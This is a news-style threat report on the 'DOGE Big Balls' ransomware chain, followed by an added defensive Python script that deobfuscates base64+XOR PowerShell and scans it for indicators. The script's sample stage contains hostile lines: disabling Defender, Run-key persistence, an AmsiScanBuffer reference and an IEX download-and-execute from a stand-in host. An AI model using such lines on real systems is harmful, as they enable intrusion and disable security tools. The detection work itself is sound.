A recent discovery by Netskope Threat Labs has brought to light a highly complex ransomware variant dubbed “DOGE Big Balls,” a derivative of the Fog ransomware.
Named provocatively after the Department of Government Efficiency (DOGE), this ransomware incorporates political statements and taunts in its payloads, including references to public figures and YouTube videos.
The ransomware is delivered through a multi-stage infection chain built from custom PowerShell scripts, open-source tools such as Mimikatz and Rubeus, a bring-your-own-vulnerable-driver (BYOVD) exploit, and red-team frameworks such as Havoc.

The frequent updates to its payloads, hosted on platforms like Netlify, underscore the adaptability and persistence of the threat actors behind this campaign.
Unveiling a Sophisticated Ransomware Variant
The infection process begins with an MSI file, payload.msi. The initial access vector is not confirmed, but historical reports from Trend Micro and Cyble suggest it arrives through phishing emails or exploitation of vulnerable internet-facing services.
Upon execution, the MSI runs a PowerShell script, wix.ps1, whose contents are obfuscated with base64 encoding and a XOR layer (XOR is obfuscation, not encryption, and the key is recoverable from the script itself). The script checks whether it is running with administrative privileges and establishes persistence in two ways: an LNK file named “EdgeAutoUpdater.lnk” in the Windows Startup folder and a scheduled task named “EdgeAutoUpdaterTask.”

It then downloads and executes stage1.ps1 from a central URL. That stage creates a hidden directory under the Startup folder, disables Windows Defender, and adds further persistence through registry Run keys.
Stage1.ps1 in turn downloads a series of payloads, including cwiper.exe, ktool.exe and several further scripts. Over time the set of payloads has grown to include the DOGE Big Balls ransomware binary itself, Havoc Demon payloads, and a BYOVD component that exploits CVE-2015-2291 in the Intel Ethernet diagnostics driver iQVW64.sys to gain kernel-level privileges.
The Multi-Stage Infection Chain
Subsequent scripts such as amsibypass.ps1 target the Windows Antimalware Scan Interface (AMSI) by patching the AmsiScanBuffer function in memory, so that script content is never handed to the installed antimalware engine, while pivot.ps1 handles lateral movement, using Invoke-Mimikatz.ps1 for credential dumping and Invoke-SMBExec.ps1 for SMB-based propagation.
The scripts gather extensive reconnaissance data, including the host’s public IP, open ports and password hashes; the hashes feed Pass-the-Hash attacks that spread stage1.ps1 to other machines in the Active Directory (AD) environment.
Additional scripts like dcstage1.ps1 and rubeuspivot.ps1 focus on Domain Controllers, employing Rubeus for Pass-The-Ticket attacks and creating backdoor accounts like “svcadmin” for sustained access.
Tools like ZeroTier, installed via ztinstall.ps1, and potential Cobalt Strike beacons through webdelivery.ps1, enhance remote access capabilities for the attackers.
Moreover, scripts like xmrigstart.ps1 deploy cryptocurrency miners, adding a financial motive to the destructive intent of the ransomware.
The continuous evolution of payloads, with new additions like addadmins.ps1 for administrator account creation and shwatchdog.ps1 for process monitoring, illustrates the dynamic and relentless nature of this threat.
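The loader stages described above are obfuscated with a XOR layer under base64, and each stage carries recognisable tradecraft (the EdgeAutoUpdater persistence names, Defender tampering, the AmsiScanBuffer patch, staged downloads, Mimikatz, SMBExec and Rubeus). The script below is an added example, not code from the Netskope report or from the malware: it recovers a single-byte XOR key from such a blob by scoring candidate plaintexts for PowerShell tokens, then scans the recovered script for those indicators. The sample stage, the key (0x5A) and the indicator list are constructed assumptions for the example; the real wix.ps1 and stage1.ps1 contents and key are not given on this page.

```python
"""Deobfuscate a base64+XOR PowerShell stage and scan it for the tradecraft
described in the article.  Added example with constructed data; the sample
script, the key and the indicator list are assumptions, not the real
wix.ps1 / stage1.ps1 contents."""
import base64
import re
import string

# Constructed stand-in for an obfuscated loader stage.  It only mimics the
# behaviours named in the article (persistence names, Defender tampering,
# AMSI patching, staged download); it is not the real malware script.
SAMPLE_STAGE = r"""
$lnk = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\EdgeAutoUpdater.lnk"
Register-ScheduledTask -TaskName "EdgeAutoUpdaterTask" -Action $action -Trigger $trigger
Set-MpPreference -DisableRealtimeMonitoring $true
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "EdgeAutoUpdater" -Value $lnk
$patch = [Kernel32]::GetProcAddress($amsi, "AmsiScanBuffer")
IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage1.ps1")
"""
ASSUMED_KEY = 0x5A  # assumption: a single-byte XOR key; the real key is unknown


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def encode_stage(script: str, key: int) -> str:
    """Obfuscate the way the article describes: XOR first, then base64."""
    return base64.b64encode(xor_bytes(script.encode("utf-8"), key)).decode("ascii")


def decode_stage(blob: str, key: int) -> str:
    return xor_bytes(base64.b64decode(blob), key).decode("utf-8", errors="replace")


# Multi-character PowerShell tokens only: a wrong key can map some other
# byte onto a single character such as '$', so single characters are not used.
PS_TOKENS = ("Invoke-", "New-Object", "Set-", "http", ".ps1", "-Path",
             "DownloadString", "$env:")
PRINTABLE = set(string.printable.encode("ascii"))


def plaintext_score(candidate: bytes) -> int:
    """Higher is more PowerShell-like: token hits reward, non-printable bytes penalise."""
    text = candidate.decode("latin-1")  # never fails, one char per byte
    hits = sum(text.count(tok) for tok in PS_TOKENS)
    junk = sum(1 for b in candidate if b not in PRINTABLE)
    return hits * 10 - junk


def recover_key(blob: str) -> tuple[int, str]:
    """Brute-force the single-byte key; the right one yields readable PowerShell."""
    raw = base64.b64decode(blob)
    best_key = max(range(1, 256), key=lambda k: plaintext_score(xor_bytes(raw, k)))
    return best_key, xor_bytes(raw, best_key).decode("utf-8", errors="replace")


# Indicators drawn from the behaviours the article names.  Patterns are
# illustrative; tune them against your own script-block logging (Event 4104).
INDICATORS = {
    "startup_lnk_or_task": re.compile(r"EdgeAutoUpdater(Task)?\b"),
    "defender_tamper": re.compile(r"Set-MpPreference\s+-Disable", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
    "amsi_patch": re.compile(r"AmsiScanBuffer", re.I),
    "staged_download": re.compile(r"DownloadString|Invoke-WebRequest|iwr\b", re.I),
    "credential_dump": re.compile(r"Invoke-Mimikatz|sekurlsa", re.I),
    "smb_lateral": re.compile(r"Invoke-SMBExec", re.I),
    "kerberos_abuse": re.compile(r"Rubeus|asktgt|ptt\b", re.I),
}


def scan_script(text: str) -> list[str]:
    """Return the names of every indicator that matches the (deobfuscated) script."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


if __name__ == "__main__":
    blob = encode_stage(SAMPLE_STAGE, ASSUMED_KEY)
    key, script = recover_key(blob)
    print(f"recovered key 0x{key:02x}; indicators: {scan_script(script)}")
```

The key-recovery step only handles a single-byte XOR; a multi-byte key needs a per-position frequency analysis, and a stage that pulls its key from a remote URL will need the network capture as well. Run the scan over the deobfuscated text rather than the base64 blob, since the blob itself contains none of the tokens.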
According to the report, Netskope’s detection signatures, including Generic.ShellCode.Marte.2.F02D5747 and Script-PowerShell.Trojan.Powdow, cover the observed payloads, but the complexity of the chain and the frequency of updates mean signature coverage alone is unlikely to keep pace.
The DOGE Big Balls ransomware exemplifies the growing sophistication of cyber threats, merging technical prowess with psychological provocation, necessitating robust defense mechanisms and vigilant monitoring to mitigate its impact on targeted environments.